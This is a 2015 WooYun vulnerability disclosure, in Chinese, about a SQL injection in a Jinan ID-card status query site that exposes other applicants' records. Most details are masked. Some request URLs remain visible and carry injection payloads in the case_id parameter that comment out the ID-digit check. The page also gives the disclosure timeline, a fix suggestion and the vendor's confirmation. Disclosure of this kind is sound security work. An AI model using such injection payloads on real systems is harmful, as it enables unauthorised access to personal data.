当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132876

漏洞标题:济南市某身份证办证查询网站存在sql注入,可利用进行越权

相关厂商:济南市某敏感单位

漏洞作者: Mr.R

提交时间:2015-08-10 15:03

修复时间:2015-09-27 16:58

公开时间:2015-09-27 16:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-13: 厂商已经确认,细节仅向厂商公开
2015-08-23: 细节向核心白帽子及相关领域专家公开
2015-09-02: 细节向普通白帽子公开
2015-09-12: 细节向实习白帽子公开
2015-09-27: 细节向公众公开

简要描述:

23333 我只是想愉快地办张身份证 听说可以在线查询进度 就玩了圈 。。 结果发现 咳咳 这信息安全。 还有这效率 都10天了 还没办好 说好的3-8天呢

详细说明:

mask 区域
*****^ 用Burp抓包^*****
1.://**.**.**//**.**.**.**/jnms/business/sfzxxcx.jspcase_id=3701031142015072900013,8531&code=021e793a20ec5edc699147e8398464aX&state=1</code>_
*****^,然后更改case_*****
*****2da658209c7714da38.png" alt=&*****
*****^,逗号后为^*****
*****^^位进行枚举来实现越^*****
*****^^一^*****
*****^^现相应速度^*****
*****^^转而^*****
*****但是有waf小^*****
*****^,成功想^*****
*****^^,于是想到sq*****
*****031142015072900013' an*****
*****于身份证后四位的判^*****
2.://**.**.**//**.**.**.**/jnms/business/sfzxxcx.jspcase_id=3701031142015072900013&
*****^中^*****
*****015072900013'/*' and*****
*****四位的^*****
**********
*****^个^*****
3.://**.**.**//**.**.**.**/jnms/business/sfzxxcx.jspcase_id=3701031142015072800001%27/*,8531*/%20--&code=021e793a20ec5edc699147e8398464aX&state=1</code>_
*****6f63bcd3023e.png" alt=&quo*****
4.://**.**.**//**.**.**.**/jnms/business/sfzxxcx.jspcase_id=3701031142015072800002%27/*,8531*/%20--&code=021e793a20ec5edc699147e8398464aX&state=1</code>_
*****a7538dcc93d3.png" alt=&quo*****
*****^的都能领证了 *****

漏洞证明:

mask 区域
*****^ 用Burp抓包^*****
1.://**.**.**//**.**.**.**/jnms/business/sfzxxcx.jspcase_id=3701031142015072900013,8531&code=021e793a20ec5edc699147e8398464aX&state=1</code>_
*****^,然后更改case_*****
*****2da658209c7714da38.png" alt=&*****
*****^,逗号后为^*****
*****^^位进行枚举来实现越^*****
*****^^一^*****
*****^^现相应速度^*****
*****^^转而^*****
*****但是有waf小^*****
*****^,成功想^*****
*****^^,于是想到sq*****
*****031142015072900013' an*****
*****于身份证后四位的判^*****
2.://**.**.**//**.**.**.**/jnms/business/sfzxxcx.jspcase_id=3701031142015072900013&
*****^中^*****
*****015072900013'/*' and*****
*****四位的^*****
**********
*****^个^*****
3.://**.**.**//**.**.**.**/jnms/business/sfzxxcx.jspcase_id=3701031142015072800001%27/*,8531*/%20--&code=021e793a20ec5edc699147e8398464aX&state=1</code>_
*****6f63bcd3023e.png" alt=&quo*****
4.://**.**.**//**.**.**.**/jnms/business/sfzxxcx.jspcase_id=3701031142015072800002%27/*,8531*/%20--&code=021e793a20ec5edc699147e8398464aX&state=1</code>_
*****a7538dcc93d3.png" alt=&quo*****
*****^的都能领证了 *****

修复方案:

1.修复sql注入。。。
2.咱敢不敢判断下权限?比如扫了以后要输入全部的身份证号才能显示出状态

版权声明:转载请注明来源 Mr.R@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-13 16:57

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无